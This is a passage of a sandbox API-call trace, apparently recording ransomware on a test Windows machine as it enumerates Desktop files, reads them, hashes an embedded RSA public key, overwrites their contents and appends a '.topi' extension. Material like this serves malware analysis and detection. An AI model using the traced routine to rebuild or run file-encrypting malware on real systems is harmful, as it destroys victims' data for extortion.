lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x31d0980*, lpNumberOfBytesWritten=0x9ccfb50*=0x28, lpOverlapped=0x0) returned 1 [0095.827] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d0980 | out: hHeap=0x680000) returned 1 [0095.827] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0095.827] WriteFile (in: hFile=0x6a8, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9ccfb50*=0x26, lpOverlapped=0x0) returned 1 [0095.827] CloseHandle (hObject=0x6a8) returned 1 [0095.836] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa0) returned 0x317ebb8 [0095.836] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8b0) returned 0x31cf750 [0095.836] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x317ebb8 | out: hHeap=0x680000) returned 1 [0095.836] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HuRLDatxCVujdx\\0w4cso8bfItEFL0gz-o.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\hurldatxcvujdx\\0w4cso8bfitefl0gz-o.gif"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HuRLDatxCVujdx\\0w4cso8bfItEFL0gz-o.gif.topi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\hurldatxcvujdx\\0w4cso8bfitefl0gz-o.gif.topi")) returned 1 [0095.837] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0095.837] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0095.837] VirtualFree (lpAddress=0x3750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.838] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3152ab8 | out: hHeap=0x680000) returned 1 [0095.838] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc3fec170, ftCreationTime.dwHighDateTime=0x1d5bef7, ftLastAccessTime.dwLowDateTime=0xb40c98b0, ftLastAccessTime.dwHighDateTime=0x1d5bfc3, ftLastWriteTime.dwLowDateTime=0xb40c98b0, ftLastWriteTime.dwHighDateTime=0x1d5bfc3, nFileSizeHigh=0x0, nFileSizeLow=0xf0d0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HKxIojb2dDJ.ods", cAlternateFileName="HKXIOJ~1.ODS")) returned 1 [0095.838] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e3d30 [0095.838] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa6) returned 0x3152ab8 [0095.838] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3d30 | out: hHeap=0x680000) returned 1 [0095.838] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HuRLDatxCVujdx\\HKxIojb2dDJ.ods") returned=".ods" [0095.838] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HuRLDatxCVujdx\\HKxIojb2dDJ.ods" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\hurldatxcvujdx\\hkxiojb2ddj.ods"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6a8 [0095.838] GetFileSizeEx (in: hFile=0x6a8, lpFileSize=0x9ccfb40 | out: lpFileSize=0x9ccfb40*=61648) returned 1 [0095.838] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3750000 [0095.841] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0xf0aa, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0095.841] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9ccfb78, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb78*=0x26, lpOverlapped=0x0) returned 1 [0095.842] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0095.842] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0095.842] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0095.842] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9ccfb70, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb70*=0xf0d0, lpOverlapped=0x0) returned 1 [0095.843] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0095.843] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f1) returned 0x31d5100 [0095.843] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0095.843] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0095.843] CryptAcquireContextW (in: phProv=0x9ccfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9ccfa50*=0x6df1a0) returned 1 [0095.844] CryptCreateHash (in: hProv=0x6df1a0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9ccfa58 | out: phHash=0x9ccfa58) returned 1 [0095.844] CryptHashData (hHash=0x31c7580, pbData=0x31d5100, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0095.844] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x0, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9ccfa54) returned 1 [0095.844] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x11) returned 0x314d0e8 [0095.844] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x314d0e8, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x314d0e8, pdwDataLen=0x9ccfa54) returned 1 [0095.844] GetLastError () returned 0x0 [0095.844] CryptDestroyHash (hHash=0x31c7580) returned 1 [0095.844] CryptReleaseContext (hProv=0x6df1a0, dwFlags=0x0) returned 1 [0095.844] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0095.844] UuidCreate (in: Uuid=0x9ccfa48 | out: Uuid=0x9ccfa48) returned 0x0 [0095.844] UuidToStringA (in: Uuid=0x9ccfa48, StringUuid=0x9ccfa40 | out: StringUuid=0x9ccfa40) returned 0x0 [0095.844] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0095.844] RpcStringFreeA (in: String=0x9ccfa40 | out: String=0x9ccfa40) returned 0x0 [0095.844] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0095.844] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0095.844] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xf0d0) returned 0x9a06a00 [0095.845] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0095.845] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0095.845] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1970 [0095.845] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0095.845] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1b68 [0095.845] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9c28 [0095.845] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x99f21d8 [0095.845] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9660 [0095.845] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x99f2220 [0095.845] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9678 [0095.845] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d96a8 [0095.845] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8eb0 [0095.845] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d96c0 [0095.845] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x24) returned 0x31d4940 [0095.845] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x158) returned 0x9a04a18 [0095.845] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x9a04a18, Size=0x218) returned 0x99e9300 [0095.845] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x558) returned 0x31d01f0 [0095.845] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d96a8 | out: hHeap=0x680000) returned 1 [0095.845] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d96c0 | out: hHeap=0x680000) returned 1 [0095.846] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8eb0 | out: hHeap=0x680000) returned 1 [0095.846] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d4940 | out: hHeap=0x680000) returned 1 [0095.846] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d01f0 | out: hHeap=0x680000) returned 1 [0095.846] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8eb0 [0095.846] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e958 [0095.846] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99d96c0 [0095.846] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314df08 [0095.846] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x9) returned 0x99d96a8 [0095.846] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e998 [0095.846] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10e) returned 0x31b6350 [0095.846] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef928 [0095.846] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9d48 [0095.846] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0e8 [0095.846] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x104) returned 0x31919a8 [0095.846] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0a8 [0095.846] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e948 [0095.846] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0095.846] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d96c0 | out: hHeap=0x680000) returned 1 [0095.846] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0095.846] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d96a8 | out: hHeap=0x680000) returned 1 [0095.846] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314df08 | out: hHeap=0x680000) returned 1 [0095.846] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e958 | out: hHeap=0x680000) returned 1 [0095.846] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8eb0 | out: hHeap=0x680000) returned 1 [0095.846] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef928 | out: hHeap=0x680000) returned 1 [0095.846] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9c28 | out: hHeap=0x680000) returned 1 [0095.846] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9300 | out: hHeap=0x680000) returned 1 [0095.847] GetCurrentThreadId () returned 0x8c4 [0095.847] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99dea38 [0095.847] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x82) returned 0x99f6df0 [0095.847] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x2c) returned 0x31c3f78 [0095.847] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df1a0 [0095.847] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x148) returned 0x31ce620 [0095.847] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e958 [0095.847] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0095.847] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99ded50 [0095.847] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0095.847] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0095.847] GetCurrentThreadId () returned 0x8c4 [0095.847] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0095.847] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0095.847] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xeb) returned 0x99e4988 [0095.847] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0095.847] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0095.847] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0095.847] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0095.847] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4988 | out: hHeap=0x680000) returned 1 [0095.847] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99def60 [0095.848] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e958 | out: hHeap=0x680000) returned 1 [0095.848] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4c) returned 0x31cb988 [0095.848] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e958 [0095.848] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99deb40 [0095.848] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0095.848] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8eb0 [0095.848] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0095.848] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0095.848] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9f8 [0095.848] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e918 [0095.848] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9b8 [0095.848] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9a8 [0095.848] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e968 [0095.848] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0095.848] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d96a8 [0095.848] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9f8 | out: hHeap=0x680000) returned 1 [0095.848] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9f8 [0095.848] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0095.848] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0095.848] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea08 [0095.848] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea18 [0095.848] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9e8 [0095.848] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d96c0 [0095.848] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea18 | out: hHeap=0x680000) returned 1 [0095.848] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314df08 [0095.848] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea08 | out: hHeap=0x680000) returned 1 [0095.848] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9690 [0095.848] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9e8 | out: hHeap=0x680000) returned 1 [0095.848] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d89a0 [0095.849] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0095.849] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8e68 [0095.849] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e918 | out: hHeap=0x680000) returned 1 [0095.849] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8e80 [0095.849] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e968 | out: hHeap=0x680000) returned 1 [0095.849] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99d96d8 [0095.849] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8e80 | out: hHeap=0x680000) returned 1 [0095.849] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99d8e80 [0095.849] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8e68 | out: hHeap=0x680000) returned 1 [0095.849] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e968 [0095.849] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e958 | out: hHeap=0x680000) returned 1 [0095.849] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314c608 [0095.849] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e968 | out: hHeap=0x680000) returned 1 [0095.849] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314c768 [0095.849] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d96a8 | out: hHeap=0x680000) returned 1 [0095.849] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d96a8 [0095.849] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9f8 | out: hHeap=0x680000) returned 1 [0095.849] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x204) returned 0x99e9300 [0095.849] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8eb0 | out: hHeap=0x680000) returned 1 [0095.849] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x108) returned 0x3191bd8 [0095.849] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8e80 | out: hHeap=0x680000) returned 1 [0095.849] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x210) returned 0x99e9528 [0095.849] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314c768 | out: hHeap=0x680000) returned 1 [0095.849] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10c) returned 0x31b6350 [0095.849] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9b8 | out: hHeap=0x680000) returned 1 [0095.849] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x108) returned 0x3191ac0 [0095.849] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d96a8 | out: hHeap=0x680000) returned 1 [0095.849] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x200) returned 0x31d5100 [0095.849] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3191bd8 | out: hHeap=0x680000) returned 1 [0095.850] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99dee58 [0095.850] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0095.850] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df1a0 | out: hHeap=0x680000) returned 1 [0095.850] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99def60 | out: hHeap=0x680000) returned 1 [0095.850] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99dee58 | out: hHeap=0x680000) returned 1 [0095.850] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314c608 | out: hHeap=0x680000) returned 1 [0095.850] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3191ac0 | out: hHeap=0x680000) returned 1 [0095.850] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9528 | out: hHeap=0x680000) returned 1 [0095.850] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0095.850] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0095.850] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9a8 | out: hHeap=0x680000) returned 1 [0095.850] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d96d8 | out: hHeap=0x680000) returned 1 [0095.850] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0095.850] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d89a0 | out: hHeap=0x680000) returned 1 [0095.850] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314df08 | out: hHeap=0x680000) returned 1 [0095.850] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d96c0 | out: hHeap=0x680000) returned 1 [0095.850] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9690 | out: hHeap=0x680000) returned 1 [0095.850] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ce620 | out: hHeap=0x680000) returned 1 [0095.850] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3f78 | out: hHeap=0x680000) returned 1 [0095.850] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ded50 | out: hHeap=0x680000) returned 1 [0095.851] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9678 | out: hHeap=0x680000) returned 1 [0095.851] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f2220 | out: hHeap=0x680000) returned 1 [0095.851] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9300 | out: hHeap=0x680000) returned 1 [0095.851] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99deb40 | out: hHeap=0x680000) returned 1 [0095.851] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cb988 | out: hHeap=0x680000) returned 1 [0095.851] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31919a8 | out: hHeap=0x680000) returned 1 [0095.851] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0e8 | out: hHeap=0x680000) returned 1 [0095.851] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e948 | out: hHeap=0x680000) returned 1 [0095.851] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0a8 | out: hHeap=0x680000) returned 1 [0095.851] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9d48 | out: hHeap=0x680000) returned 1 [0095.851] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e1b68 | out: hHeap=0x680000) returned 1 [0095.851] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0095.851] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e1970 | out: hHeap=0x680000) returned 1 [0095.851] WriteFile (in: hFile=0x6a8, lpBuffer=0x9a06a00*, nNumberOfBytesToWrite=0xf0cb, lpNumberOfBytesWritten=0x9ccfb14, lpOverlapped=0x0 | out: lpBuffer=0x9a06a00*, lpNumberOfBytesWritten=0x9ccfb14*=0xf0cb, lpOverlapped=0x0) returned 1 [0095.851] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a06a00 | out: hHeap=0x680000) returned 1 [0095.851] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0xf0d0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0095.852] WriteFile (in: hFile=0x6a8, lpBuffer=0x99dea38*, 